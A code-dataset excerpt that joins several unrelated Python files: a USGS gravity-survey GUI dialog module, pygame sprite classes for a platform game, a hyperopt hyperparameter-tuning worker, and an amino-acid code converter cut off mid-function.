-*-\n\"\"\"\ngui_objects.py\n==============\n\nMinor GSadjust GUI objects for GSadjust\n---------------------------------------\n\nMajor GUI objects (tabs, table views) are in GSadjust.py. This module has primarily pop-up dialogs used to set\nnetwork adjustment settings, show gravity change over time, etc. Significant dialogs are written as classes and\ninstantiated in GSadjust.py. Minor dialogs are written as functions and called directly.\n\nThis software is preliminary or provisional and is subject to revision. It is being\nprovided to meet the need for timely best science. The software has not received final approval by the U.S.\nGeological Survey (USGS). No warranty, expressed or implied, is made by the USGS or the U.S. Government as to the\nfunctionality of the software and related material nor shall the fact of release constitute any such warranty. The\nsoftware is provided on the condition that neither the USGS nor the U.S. Government shall be held liable for any\ndamages resulting from the authorized or unauthorized use of the software.\n\"\"\"\nimport os\nimport datetime as dt\nimport numpy as np\nfrom PyQt5 import QtGui, QtCore, QtWidgets\nimport logging\n\nfrom data_objects import Datum, AdjustmentOptions\nfrom pyqt_models import GravityChangeModel, DatumTableModel\nimport a10\n\n\n\nclass AdjustOptions(QtWidgets.QDialog):\n \"\"\"\n Dialog to set network adjustment options.\n \"\"\"\n def __init__(self, survey_str, options):\n super(AdjustOptions, self).__init__()\n self.title = 'Select directory with Abs. g files (.project.txt)'\n self.setGeometry(50, 50, 350, 350)\n self.ao = options\n self.surveys_to_update = ''\n self.update_options = []\n self.drift_temp_chk = QtWidgets.QCheckBox('Model temperature drift, polynomial degree:')\n self.sigma_factor_chk = QtWidgets.QCheckBox('Std. dev. multiplier')\n self.sigma_add_chk = QtWidgets.QCheckBox('Add to std. dev.')\n self.sigma_min_chk = QtWidgets.QCheckBox('Minimum std. dev.')\n self.cal_coeff_chk = QtWidgets.QCheckBox('Include relative meter calibration coefficient')\n self.alpha_text = QtWidgets.QLabel('Significance level for global model test')\n self.woutfiles_chk = QtWidgets.QCheckBox('Write output files')\n self.drift_temp_edit = QtWidgets.QLineEdit(str(self.ao.model_temp_degree))\n self.sigma_factor_edit = QtWidgets.QLineEdit(str(self.ao.sigma_factor))\n self.sigma_add_edit = QtWidgets.QLineEdit(str(self.ao.sigma_add))\n self.sigma_min_edit = QtWidgets.QLineEdit(str(self.ao.sigma_min))\n self.alpha_edit = QtWidgets.QLineEdit(str(self.ao.alpha))\n self.init_ui(survey_str)\n\n def init_ui(self, survey_name):\n if survey_name is not None:\n self.drift_temp_chk.setChecked(self.ao.use_model_temp)\n self.sigma_factor_chk.setChecked(self.ao.use_sigma_factor)\n self.sigma_add_chk.setChecked(self.ao.use_sigma_add)\n self.sigma_min_chk.setChecked(self.ao.use_sigma_min)\n self.cal_coeff_chk.setChecked(self.ao.cal_coeff)\n self.woutfiles_chk.setChecked(self.ao.woutfiles)\n\n # create buttons and actions\n cancel_button = QtWidgets.QPushButton('Cancel')\n cancel_button.clicked.connect(self.close)\n current_button = QtWidgets.QPushButton('Apply to current survey (' + survey_name + ')')\n current_button.clicked.connect(self.apply_current)\n all_button = QtWidgets.QPushButton('Apply to all surveys')\n all_button.clicked.connect(self.apply_all)\n\n buttonBox = QtWidgets.QDialogButtonBox(QtCore.Qt.Horizontal)\n buttonBox.addButton(current_button, QtWidgets.QDialogButtonBox.ActionRole)\n buttonBox.addButton(all_button, QtWidgets.QDialogButtonBox.ActionRole)\n buttonBox.addButton(cancel_button, QtWidgets.QDialogButtonBox.ActionRole)\n\n grid = QtWidgets.QGridLayout()\n grid.addWidget(self.drift_temp_chk, 1, 0)\n grid.addWidget(self.drift_temp_edit, 1, 1)\n grid.addWidget(self.sigma_factor_chk, 2, 0)\n grid.addWidget(self.sigma_factor_edit, 2, 1)\n grid.addWidget(self.sigma_add_chk, 3, 0)\n grid.addWidget(self.sigma_add_edit, 3, 1)\n grid.addWidget(self.sigma_min_chk, 4, 0)\n grid.addWidget(self.sigma_min_edit, 4, 1)\n grid.addWidget(self.cal_coeff_chk, 5, 0)\n grid.addWidget(self.alpha_text, 6, 0)\n grid.addWidget(self.alpha_edit, 6, 1)\n grid.addWidget(self.woutfiles_chk, 7, 0)\n grid.addWidget(buttonBox, 8, 0)\n\n self.setLayout(grid)\n self.setWindowTitle('Network adjustment options')\n self.setWindowModality(QtCore.Qt.ApplicationModal)\n else:\n show_message('Please load a survey first', 'Network adjustment options')\n\n def set_adjust_options(self):\n if self.drift_temp_chk.isChecked():\n self.ao.use_model_temp = True\n self.ao.model_temp_degree = int(self.ao.model_temp_degree.text())\n else:\n self.ao.use_model_temp = False\n if self.sigma_factor_chk.isChecked():\n self.ao.use_sigma_factor = True\n self.ao.sigma_factor = float(self.sigma_factor_edit.text())\n else:\n self.ao.use_sigma_factor = False\n if self.sigma_add_chk.isChecked():\n self.ao.use_sigma_add = True\n self.ao.sigma_add = float(self.sigma_add_edit.text())\n else:\n self.ao.use_sigma_add = False\n if self.sigma_min_chk.isChecked():\n self.ao.use_sigma_min = True\n self.ao.sigma_min = float(self.sigma_min_edit.text())\n else:\n self.ao.use_sigma_min = False\n if self.cal_coeff_chk.isChecked():\n self.ao.cal_coeff = True\n else:\n self.ao.cal_coeff = False\n self.ao.alpha = float(self.alpha_edit.text())\n if self.woutfiles_chk.isChecked():\n self.ao.woutfiles = True\n else:\n self.ao.woutfiles = False\n\n def apply_current(self):\n self.set_adjust_options()\n self.surveys_to_update = 'single'\n self.accept()\n\n def apply_all(self):\n self.set_adjust_options()\n self.surveys_to_update = 'all'\n self.accept()\n\n\nclass IncrMinuteTimeEdit(QtWidgets.QTimeEdit):\n \"\"\"\n Provides a QTimeEdit with that increments at some minute interval.\n\n The PyQt Time edit doesn't allow for rolling-over the minutes to hours, apparently. I.e., the hours and minutes\n boxes are limited to 0-60. This implements that somewhat, but one can't decrement minutes below 00 in either the\n MinuteSection or HourSection. This manifests as when at a time, e.g., 3:00, stepBy isn't called when in the\n Minute Section because time is already at 0.\n \"\"\"\n def __init__(self, time):\n super(IncrMinuteTimeEdit, self).__init__(time)\n self.step = 10\n\n def stepBy(self, steps):\n if self.currentSection() == self.HourSection:\n self.incrTime(steps)\n if self.currentSection() == self.MinuteSection:\n self.incrTime(steps)\n\n def incrTime(self, steps):\n hours = self.dateTime().time().hour()\n minutes = self.dateTime().time().minute() + steps * self.step\n if minutes < 0:\n self.setTime(QtCore.QTime(hours-1, 60 + minutes))\n if minutes < 60:\n self.setTime(QtCore.QTime(hours, minutes))\n # QtWidgets.QTimeEdit.stepBy(self, steps * self.step)\n else:\n self.setTime(QtCore.QTime(hours+1, 60 % minutes))\n\n\ndef copy_cells_to_clipboard(table):\n if len(table.selectedIndexes()) > 0:\n # sort select indexes into rows and columns\n previous = table.selectedIndexes()[0]\n columns = []\n rows = []\n for index in table.selectedIndexes(): # columns first , then rows\n if previous.row() != index.row():\n columns.append(rows)\n rows = []\n rows.append(index.data())\n previous = index\n columns.append(rows)\n\n # add rows and columns to clipboard\n clipboard = \"\"\n ncols = len(columns[0])\n nrows = len(columns)\n\n # add header to clipboard\n for c in range(ncols):\n clipboard += table.model().headerData(c, QtCore.Qt.Horizontal)\n clipboard += '\\t'\n clipboard += '\\n'\n\n for r in range(nrows):\n for c in range(ncols):\n clipboard += columns[r][c]\n if c != (ncols - 1):\n clipboard += '\\t'\n clipboard += '\\n'\n\n # copy to the system clipboard\n sys_clip = QtWidgets.QApplication.clipboard()\n sys_clip.setText(clipboard)\n else:\n show_message('No rows selected (Ctrl-a to select all)', 'Copy warning')\n\ndef date_method_dialog():\n \"\"\"\n Dialog to select data import method - all data into one survey of with dates contained in a second file.\n :return: String indicating survey import type ('choose' or 'single')\n \"\"\"\n msg = QtWidgets.QMessageBox()\n msg.setIcon(QtWidgets.QMessageBox.Question)\n\n msg.setText(\"Start/end date file not found.\")\n msg.setWindowTitle(\"Specify start/end dates\")\n msg.addButton(QtWidgets.QPushButton('Choose File'), QtWidgets.QMessageBox.YesRole)\n msg.addButton(QtWidgets.QPushButton('Single Survey'), QtWidgets.QMessageBox.NoRole)\n msg.addButton(QtWidgets.QPushButton('Cancel'), QtWidgets.QMessageBox.RejectRole)\n method = msg.exec_()\n if method == 0:\n return 'choose'\n elif method == 1:\n return 'single'\n else:\n return False\n\n\ndef about_dialog():\n msg1 = 'GSadjust, a product of the USGS Southwest Gravity Program
' \\\n 'http://go.usa.gov/xqBnQ' \\\n '

https://github.com/jkennedy-usgs/GSadjust' \\\n '
jkennedy@usgs.gov'\n text, ok = QtWidgets.QMessageBox.about(None, \"GSadust\", msg1)\n\n\ndef vertical_gradient_interval_dialog(default_interval):\n text, ok = QtWidgets.QInputDialog.getDouble(None, \"Vertical-gradient interval\",\n \"Interval, in cm:\",\n default_interval,\n 0, 200, 1)\n if ok:\n # self.campaigndata.verticalgradientinterval = float(text)\n return float(text)\n else:\n return default_interval\n\n\ndef gravity_change_table(MainProg, table, header, full_table=False):\n \"\"\"\n Floating window to show gravity-change results\n :param MainProg:\n :param table:\n :param header:\n \"\"\"\n gravity_change_window = QtWidgets.QWidget()\n gravity_change_window.model = GravityChangeModel(table, header)\n gravity_change_window.table = QtWidgets.QTableView()\n gravity_change_window.table.setModel(gravity_change_window.model)\n\n # Create buttons and actions\n gravity_change_window.btn1 = QtWidgets.QPushButton('Copy to clipboard')\n gravity_change_window.btn1.clicked.connect(lambda: copy_cells_to_clipboard(MainProg.popup.table))\n if not full_table:\n gravity_change_window.btn2 = QtWidgets.QPushButton('Show full table')\n gravity_change_window.btn2.clicked.connect(lambda: show_full_table(MainProg))\n else:\n gravity_change_window.btn2 = QtWidgets.QPushButton('Show simple table')\n gravity_change_window.btn2.clicked.connect(lambda: MainProg.compute_gravity_change())\n\n\n # Locations\n vbox = QtWidgets.QVBoxLayout()\n vbox.addWidget(gravity_change_window.table)\n hbox = QtWidgets.QHBoxLayout()\n hbox.addStretch(0)\n hbox.addWidget(gravity_change_window.btn1)\n hbox.addWidget(gravity_change_window.btn2)\n vbox.addLayout(hbox)\n gravity_change_window.setLayout(vbox)\n gravity_change_window.setWindowTitle('Gravity Change')\n gravity_change_window.setGeometry(200, 200, 600, 800)\n MainProg.popup = gravity_change_window\n MainProg.popup.show()\n\ndef show_full_table(MainProg):\n MainProg.popup.close()\n table = MainProg.compute_gravity_change(full_table=True)\n header = table[0]\n tp_table = list(zip(*table[1:]))\n gravity_change_table(MainProg, tp_table, header, full_table=True)\n return\n\ndef read_start_end_dates(filename):\n \"\"\" read user input start and end dates of each campaign\n current format is\n yyyy/mm/dd hh:mn:ss yyyy/mm/dd hh:mn:ss\n yyyy/mm/dd hh:mn:ss yyyy/mm/dd hh:mn:ss\n ...\n but can be changed anytime here\n \"\"\"\n i = 0\n try:\n fh = open(filename, 'r')\n start_end_dates = []\n for line in fh:\n i += 1\n # Clean line\n line = line.strip()\n # parse string line first with respect to '/' characters (used in the date format),\n # then with ':' (used for the time display), eventually with the classic ' '\n vals = line.replace('/', ' ').replace(':', ' ').split()\n start_end_dates.append([dt.datetime(int(vals[0]), int(vals[1]),\n int(vals[2]), int(vals[3]), int(vals[4]), int(vals[5])),\n dt.datetime(int(vals[6]), int(vals[7]), int(vals[8]), int(vals[9]),\n int(vals[10]), int(vals[11]))])\n\n return start_end_dates\n except IOError:\n # si ça ne marche pas, affiche ce message et continue le prog\n print('No file : %s' % filename)\n except ValueError:\n print('pb at line %d : check data file' % i)\n\n\ndef show_message(message, title, icon=QtWidgets.QMessageBox.Warning):\n \"\"\"\n Generic dialog to show a message, with a single 'OK' button.\n :param message: string shown in dialog\n :param title: string shown in dialog title bar.\n :param icon: Qt icon\n \"\"\"\n msg = QtWidgets.QMessageBox()\n msg.setIcon(icon)\n msg.setText(message)\n msg.setWindowTitle(title)\n msg.exec_()\n\n\ndef rename_dialog(old_name, new_name):\n \"\"\"\n Dialog called after renaming station in treeview.\n\n Gives the option to rename stations in the current loop, survey, or throughout the campaign.\n :param old_name: string, old station name\n :param new_name: string, new station name\n :return: integer indicating extent of station rename.\n \"\"\"\n msg = QtWidgets.QMessageBox()\n q_string = 'Rename all stations from {} to {} in...'.format(old_name, new_name)\n msg.setText(q_string)\n msg.addButton(QtWidgets.QPushButton('Campaign'), 0)\n msg.addButton(QtWidgets.QPushButton('Survey'), 0)\n msg.addButton(QtWidgets.QPushButton('Loop'), 0)\n msg.addButton(QtWidgets.QPushButton('Just this station'),0)\n msg.addButton(QtWidgets.QPushButton('Cancel'), 1)\n method = msg.exec_()\n methods = {0: 'Campaign',\n 1: 'Survey',\n 2: 'Loop',\n 3: 'Station',\n 4: 'Cancel'}\n\n return methods[method]\n\n\ndef tide_correction_dialog(MainProg):\n \"\"\"\n Dialog for choosing tide correction method: meter-supplied, Predict, Agnew, or from a file.\n :param MainProg: Main object, to be sent to tide_corrections() where the correction is applied\n \"\"\"\n msg = QtWidgets.QMessageBox()\n msg.setText(\"Select tide-correction method\")\n msg.addButton(QtWidgets.QPushButton('Meter-supplied'), 0)\n # 'Predict' not yet tested\n btn = QtWidgets.QPushButton('Predict')\n btn.setEnabled(False)\n msg.addButton(btn, 1)\n msg.addButton(QtWidgets.QPushButton('Agnew'), 2)\n msg.addButton(QtWidgets.QPushButton('From file'), 3)\n method = msg.exec_()\n tide_corrections = {0: use_meter_tide_correction,\n 1: use_predict_tides,\n 2: get_coordinates,\n 3: use_tide_time_series}\n tide_corrections[method](MainProg)\n\n\nclass SelectAbsg(QtWidgets.QDialog):\n \"\"\"\n Dialog to show absolute-gravity values from *.project.txt files. The user can select the files to import as Datums.\n \"\"\"\n def __init__(self):\n super(SelectAbsg, self).__init__()\n self.title = 'Select directory with Abs. g files (.project.txt)'\n self.left = 100\n self.top = 100\n self.width = 800\n self.height = 480\n self.new_datums = []\n\n self.splitter_window = QtWidgets.QSplitter(QtCore.Qt.Horizontal, self)\n self.tree_model = QtWidgets.QDirModel()\n self.tree = QtWidgets.QTreeView()\n self.table_model = DatumTableModel()\n self.table = QtWidgets.QTableView()\n\n self.init_ui()\n\n def export_and_close(self):\n for i in range(self.table_model.rowCount()):\n ndi = self.table_model.index(i, 0)\n nd = self.table_model.data(ndi, role=QtCore.Qt.UserRole)\n chk = self.table_model.data(ndi, role=QtCore.Qt.CheckStateRole)\n if chk == 2:\n self.new_datums.append(nd)\n self.accept()\n\n def closeEvent(self, QCloseEvent):\n return self.close()\n\n def init_ui(self):\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n\n # File-tree view and model\n self.tree.setModel(self.tree_model)\n self.tree.scrollTo(self.tree_model.index(\"E:\\\\\\\\Shared\\\\\\\\\\current\\\\\\\\\\projects\\\\\\\\\\GravityDataArchive\"))\n self.tree.setAnimated(False)\n self.tree.setIndentation(20)\n self.tree.setSortingEnabled(True)\n self.tree.setWindowTitle(\"Dir View\")\n self.tree.resize(800, 480)\n\n # Buttons\n load_button = QtWidgets.QPushButton(\"Load\")\n load_button.clicked.connect(self.load_a10_data)\n ok_button = QtWidgets.QPushButton(\"Import\")\n ok_button.clicked.connect(self.export_and_close)\n cancel_button = QtWidgets.QPushButton(\"Cancel\")\n cancel_button.clicked.connect(self.close)\n\n # Button under tree view\n button_box_left = QtWidgets.QHBoxLayout()\n button_box_left.addStretch(1)\n button_box_left.addWidget(load_button)\n\n # Button under table\n button_box_right = QtWidgets.QHBoxLayout()\n button_box_right.addStretch(1)\n button_box_right.addWidget(cancel_button)\n button_box_right.addWidget(ok_button)\n\n self.table.setModel(self.table_model)\n self.tree.resizeColumnToContents(0)\n\n # Hide file size, date modified columns\n self.tree.setColumnHidden(1, True)\n self.tree.setColumnHidden(2, True)\n self.tree.setColumnHidden(3, True)\n\n # Hide column of residuals\n self.table.setColumnHidden(6, True)\n self.tree.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)\n\n # Move date column to second from left\n self.table.horizontalHeader().moveSection(3, 1)\n\n # Layout\n final_layout = QtWidgets.QVBoxLayout()\n sublayout_left = QtWidgets.QVBoxLayout()\n sublayout_right = QtWidgets.QVBoxLayout()\n sublayout_left.addWidget(self.tree)\n sublayout_left.addLayout(button_box_left)\n sublayout_right.addWidget(self.table)\n sublayout_right.addLayout(button_box_right)\n left_widget = QtWidgets.QWidget()\n left_widget.setLayout(sublayout_left)\n right_widget = QtWidgets.QWidget()\n right_widget.setLayout(sublayout_right)\n self.splitter_window.addWidget(left_widget)\n self.splitter_window.addWidget(right_widget)\n self.splitter_window.setSizes([240, 560])\n final_layout.addWidget(self.splitter_window)\n self.setLayout(final_layout)\n\n self.setWindowModality(QtCore.Qt.ApplicationModal)\n\n def load_a10_data(self):\n \"\"\"\n Parses *.project.txt files in the selected paths. Populates the dialog table model directly.\n \"\"\"\n files_found = False\n idxs = self.tree.selectedIndexes()\n self.table_model.clearDatums()\n for i in idxs:\n if i.model().isDir(i):\n pth = str(i.model().filePath(i))\n for dirname, _, fileList in os.walk(pth):\n for name in fileList:\n if '.project.txt' in name:\n files_found = True\n d = a10.A10(os.path.join(dirname, name))\n datum = Datum(d.stationname,\n g=float(d.gravity),\n sd=float(d.setscatter),\n date=d.date,\n meas_height=float(d.transferht),\n gradient=float(d.gradient),\n checked=0)\n self.table_model.insertRows(datum, 1)\n if not files_found:\n show_message('No *.project.txt files found in the selected directories.', 'Import error')\n\n\nclass ProgressBar(QtWidgets.QWidget):\n \"\"\"\n define progress bar\n \"\"\"\n\n def __init__(self, parent=None, total=20, textmess='Progress'):\n super(ProgressBar, self).__init__(parent)\n self.progressbar = QtWidgets.QProgressBar()\n self.progressbar.setMinimum(1)\n self.progressbar.setMaximum(total)\n main_layout = QtWidgets.QGridLayout()\n main_layout.addWidget(self.progressbar, 0, 1)\n self.setLayout(main_layout)\n self.setWindowTitle(textmess)\n\nfrom tide_correction import use_meter_tide_correction, use_predict_tides, get_coordinates, use_tide_time_series\n","sub_path":"main_code/gui_objects.py","file_name":"gui_objects.py","file_ext":"py","file_size_in_byte":21746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"582743212","text":"import pygame as pg\nfrom settings import *\nfrom levelsManager import *\n\nclass Ground(pg.sprite.Sprite):\n def __init__(self, x, y, w, h, game):\n pg.sprite.Sprite.__init__(self)\n self.image = pg.Surface((w, h))\n self.image.fill(BLACK)\n self.rect = self.image.get_rect()\n self.rect.move_ip(0,-20)\n self.rect.x = x\n self.rect.y = y\n\n self.game = game\n\n\nclass Spikes(pg.sprite.Sprite):\n def __init__(self, x, y, w, h, game):\n pg.sprite.Sprite.__init__(self)\n self.image = pg.Surface((w, h))\n self.image.fill(RED)\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.game = game\n\n def update(self):\n self.mort()\n\n def mort(self):\n self.hit = pg.sprite.spritecollide(self, self.game.player_sprite,False)\n if self.hit:\n self.game.new()\n\nclass Falling_traps(pg.sprite.Sprite):\n\n def __init__(self, x, y, w, h, bounderies, game):\n pg.sprite.Sprite.__init__(self)\n self.image = pg.Surface((w, h))\n self.image.fill(BLUE)\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.isFalling = False\n self.game = game\n self.w = w\n self.bounderies = bounderies\n\n def update(self):\n if self.rect.x < self.game.player.pos.x < self.rect.x + self.w or self.rect.x < self.game.head.rect.x < self.rect.x + self.w:\n self.isFalling = True\n\n self.fall()\n self.mort()\n\n def fall(self):\n if self.isFalling:\n self.rect.y += FALLSPEEDTRAP\n\n if self.rect.y > self.bounderies:\n self.rect.y = self.bounderies\n\n\n\n def mort(self):\n self.hit = pg.sprite.spritecollide(self, self.game.player_sprite,False)\n if self.hit:\n self.game.new()\n\nclass Porte(pg.sprite.Sprite):\n\n def __init__(self,x,y,game):\n pg.sprite.Sprite.__init__(self)\n self.game = game\n self.x = x\n self.y = y\n self.w = 40\n self.h = 100\n self.scene = Scene\n\n self.image = pg.Surface((self.w,self.h))\n self.image.fill(BLUE)\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\n def update(self):\n hit = pg.sprite.spritecollide(self, self.game.player_sprite,False)\n if hit:\n self.scene.currentLevel += 1\n print(self.scene.currentLevel)\n self.loadNewLevel()\n\n def loadNewLevel(self):\n self.game.new()\n\n\nclass Laser_horiz(pg.sprite.Sprite):\n\n def __init__(self, x, y, w, h, game):\n pg.sprite.Sprite.__init__(self)\n self.game = game\n self.x = x\n self.y = y\n self.w = 40\n self.h = 100\n\n self.image = pg.Surface((self.w,self.h))\n self.image.fill(BLUE)\n self.image = pg.Surface((w, h))\n self.image.fill(ORCHID)\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.game = game\n self.w = w\n self.baselaser = x\n\n def update(self):\n hit = pg.sprite.spritecollide(self, self.game.player_sprite,False)\n self.rect.x += LASER_SPEED\n self.contact()\n\n\n\n def contact(self):\n\n if self.rect.x == 1280:\n self.rect.x = self.baselaser\n\n\n self.hit_player = pg.sprite.spritecollide(self, self.game.player_sprite,False)\n\n if self.hit_player:\n self.game.new()\n\n self.hit_sprites = pg.sprite.spritecollide(self, self.game.platforms_sprite, False)\n\n if self.hit_sprites:\n self.rect.x = self.baselaser\n","sub_path":"ISN-Projet-Final-master/sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"156402194","text":"# usage: need to change the number_of_features to proper values, model_tuned should not have the line of running it\nimport warnings\n# warnings.simplefilter(action='ignore', category=Warning)\n\nfrom multiprocessing import set_start_method\n# set_start_method('forkserver', force=True)\nimport os\nimport sys\n# stderr = sys.stderr\n# sys.stderr = open(os.devnull, 'w')\nimport random\nfrom hyperopt import hp, fmin, tpe, space_eval, rand, Trials, atpe, trials_from_docs\nfrom hyperopt.fmin import generate_trials_to_calculate\nfrom subRun import subRun\nimport pickle\nimport itertools\nimport hyperopt.pyll.stochastic\nfrom config import space, data_file, num_trials, number_of_features, num_thread_random, num_trials_random, num_thread_guided, num_trials_guided, number_iterations, history_length, num_thread_historical\nimport numpy as np\nimport multiprocessing\nimport random\n#%% tune and run\nhistorical_hyperparameter_history = 'historicalHyperparameter'\nhistoricalRecordDir = 'historicalRecord'\nrandomRecordDir = 'randomRecord'\nguidedRecordDir = 'guidedRecord'\n\nrandom.seed(1)\n\n\n# global thread_random_search\n\ndef thread_historical_search(id, trials):\n fmin(fn=subRun, space=space, algo=rand.suggest, max_evals=1,\n trials=trials, catch_eval_exceptions=True)\n with open('{}/{}'.format(historicalRecordDir, id), 'wb') as f:\n pickle.dump(trials, f)\n\ndef thread_random_search(id):\n trials = Trials()\n fmin(fn=subRun, space=space, algo=rand.suggest, max_evals=len(trials) + num_trials_random,\n trials=trials, catch_eval_exceptions=True)\n with open('{}/{}'.format(randomRecordDir, id), 'wb') as f:\n pickle.dump(trials, f)\n\n# global thread_guided_search\ndef thread_guided_search(id, trials):\n fmin(fn=subRun, space=space, algo=tpe.suggest, max_evals=len(trials) + num_trials_guided,\n trials=trials, catch_eval_exceptions=True)\n with open('{}/{}'.format(guidedRecordDir, id), 'wb') as f:\n pickle.dump(trials.trials[-num_trials_guided:], f)\n\ndef doTune(data):\n\n #%% pass data\n with open(data_file, \"wb\") as f:\n pickle.dump(data, f)\n\n #%% auto tuning\n if not os.path.exists(historicalRecordDir):\n os.makedirs(historicalRecordDir)\n\n if not os.path.exists(randomRecordDir):\n os.makedirs(randomRecordDir)\n\n if not os.path.exists(guidedRecordDir):\n os.makedirs(guidedRecordDir)\n\n # id pool\n max_id = 0 # id counter\n id_pool_random = []\n id_pool_guided = []\n # load previous hyperparamters and generate baseline historical trials record\n id_pool_historical = []\n historical_trials = Trials()\n if os.path.exists(historical_hyperparameter_history):\n with open(historical_hyperparameter_history, 'rb') as f:\n historical_hyperparameters = pickle.load(f) # historical_hyperparameters = [{'a': [1], 'c1': [], 'c2': [-0.13475270138215323]}]\n # split trials\n\n adapted_num_thread_historical = min(len(historical_hyperparameters), num_thread_historical)\n smallTrialsList = []\n sub_length = len(historical_hyperparameters) // adapted_num_thread_historical\n\n for i in range(adapted_num_thread_historical):\n if i == adapted_num_thread_historical - 1:\n smallTrialsList.append(generate_trials_to_calculate(historical_hyperparameters))\n else:\n smallTrialsList.append(generate_trials_to_calculate(historical_hyperparameters[:sub_length]))\n historical_hyperparameters = historical_hyperparameters[sub_length:]\n\n pool = multiprocessing.Pool(processes=adapted_num_thread_historical)\n for smallTrials in smallTrialsList:\n id = max_id\n max_id += 1\n id_pool_historical.append(id)\n pool.apply_async(thread_historical_search, args=(id, smallTrials))\n\n pool.close()\n pool.join()\n\n # merge trials, assign to historical_trials\n for id in id_pool_historical:\n with open('{}/{}'.format(historicalRecordDir, id), 'rb') as f:\n historical_trials = trials_from_docs(list(historical_trials) + list(pickle.load(f)))\n\n for _ in range(number_iterations):\n # random phase\n pool = multiprocessing.Pool(processes=num_thread_random)\n\n for _ in range(num_thread_random):\n id = max_id\n max_id += 1\n id_pool_random.append(id)\n pool.apply_async(thread_random_search, args=(id,))\n\n pool.close()\n pool.join()\n\n # loading random and guided pool\n merged_trials = Trials()\n for id in id_pool_random:\n with open('{}/{}'.format(randomRecordDir, id), 'rb') as f:\n merged_trials = trials_from_docs(list(merged_trials) + list(pickle.load(f)))\n\n for id in id_pool_guided:\n with open('{}/{}'.format(guidedRecordDir, id), 'rb') as f:\n merged_trials = trials_from_docs(list(merged_trials) + list(pickle.load(f)))\n\n # merge merged trials with historical trials\n merged_trials = trials_from_docs(list(merged_trials) + list(historical_trials))\n # guided phase\n pool = multiprocessing.Pool(processes=num_thread_guided)\n\n for _ in range(num_thread_guided):\n id = max_id\n max_id += 1\n id_pool_guided.append(id)\n pool.apply_async(thread_guided_search, args=(id, merged_trials))\n\n pool.close()\n pool.join()\n\n # aggregate\n merged_trials = Trials()\n for id in id_pool_random:\n with open('{}/{}'.format(randomRecordDir, id), 'rb') as f:\n merged_trials = trials_from_docs(list(merged_trials) + list(pickle.load(f)))\n\n for id in id_pool_guided:\n with open('{}/{}'.format(guidedRecordDir, id), 'rb') as f:\n merged_trials = trials_from_docs(list(merged_trials) + list(pickle.load(f)))\n\n # merge with historical trials\n merged_trials = trials_from_docs(list(merged_trials) + list(historical_trials))\n\n # extract hyperparemters\n best = fmin(fn=subRun, space=space, algo=tpe.suggest, max_evals=0, trials=merged_trials,\n catch_eval_exceptions=True, verbose=False)\n\n hyperparameters = space_eval(space, best)\n\n # save hyperparameters\n # if historical_trials contains merged_trials.best_trial, updated_historical_trials = historical_trials\n def twoTrialsAreSame(trialA, trialB):\n same = True\n for key in trialA['misc']['vals']:\n if trialA['misc']['vals'][key][0] != trialB['misc']['vals'][key][0]:\n same = False\n\n return same\n\n bestTrialAlreadyIncluded = False\n for trial in historical_trials.trials:\n if twoTrialsAreSame(trial, merged_trials.best_trial):\n bestTrialAlreadyIncluded = True\n if bestTrialAlreadyIncluded:\n updated_historical_trials = historical_trials\n else:\n updated_historical_trials = trials_from_docs(list([merged_trials.best_trial]) + list(historical_trials))\n\n with open(historical_hyperparameter_history, 'wb') as f:\n # get a list of trials, sort trials by loss, select the top history_length ones, get the parameter-value dictionary\n historical_hyperparameters = [h['misc']['vals'] for h in sorted(updated_historical_trials.trials, key=lambda k: k['result']['loss'])[: history_length]]\n for historical_hyperparameter in historical_hyperparameters: # unbox the singleton list, to make it ready for producing Trials object\n for key in historical_hyperparameter:\n historical_hyperparameter[key] = historical_hyperparameter[key][0]\n\n pickle.dump(historical_hyperparameters, f)\n\n return hyperparameters\n\n#%%\n# hyperopt.pyll.stochastic.sample(space)\n","sub_path":"covidProject/caseOnly_MAE_CNN/tuneWorker.py","file_name":"tuneWorker.py","file_ext":"py","file_size_in_byte":7811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"181906952","text":"import sys\n\ndef AA1toAA3(aa, verbose=True):\n if(aa == 'A'):\n return \"ALA\"\n elif(aa == 'C'):\n return \"CYS\"\n elif(aa == 'D'):\n return \"ASP\"\n elif(aa == 'E'):\n return(\"GLU\")\n elif(aa == 'F') :\n return(\"PHE\")\n elif(aa == 'G') :\n return(\"GLY\")\n elif(aa == 'H') :\n return(\"HIS\")\n elif(aa == 'I') :\n return(\"ILE\")\n elif(aa == 'K') :\n return(\"LYS\")\n elif(aa == 'L') :\n return(\"LEU\")\n elif(aa == 'M') :\n return(\"MET\")\n elif(aa == 'N') :\n return(\"ASN\")\n elif(aa == 'P') :\n return(\"PRO\")\n elif(aa == 'Q') :\n return(\"GLN\")\n elif(aa == 'R') :\n return(\"ARG\")\n elif(aa == 'S') :\n return(\"SER\")\n elif(aa == 'T') :\n return(\"THR\")\n elif(aa == 'V') :\n return(\"VAL\")\n elif(aa == 'W') :\n return(\"TRP\")\n elif(aa == 'Y') :\n return(\"TYR\")\n else :\n if verbose :\n print >>sys.stderr, \"The amino acid \",aa,\" is unknown!\" \n return \"UNK\"\n\ndef AA3toAA1(aa, verbose=True):\n if(aa == 'ALA'):\n return \"A\"\n elif(aa == 'CYS'):\n return \"C\"\n elif(aa == 'ASP'):\n return \"D\"\n elif(aa == 'GLU'):\n return(\"E\")\n elif(aa == 'PHE') :\n return(\"F\")\n elif(aa == 'GLY') :\n return(\"G\")\n elif(aa == 'HIS') :\n return(\"H\")\n elif(aa == 'ILE') :\n return(\"I\")\n elif(aa == 'LYS') :\n return(\"K\")\n elif(aa == 'LEU') :\n return(\"L\")\n elif(aa == 'MET') :\n return(\"M\")\n elif(aa == 'ASN') :\n return(\"N\")\n elif(aa == 'PRO') :\n return(\"P\")\n elif(aa == 'GLN') :\n return(\"Q\")\n elif(aa == 'ARG') :\n return(\"R\")\n elif(aa == 'SER') :\n return(\"S\")\n elif(aa == 'THR') :\n return(\"T\")\n elif(aa 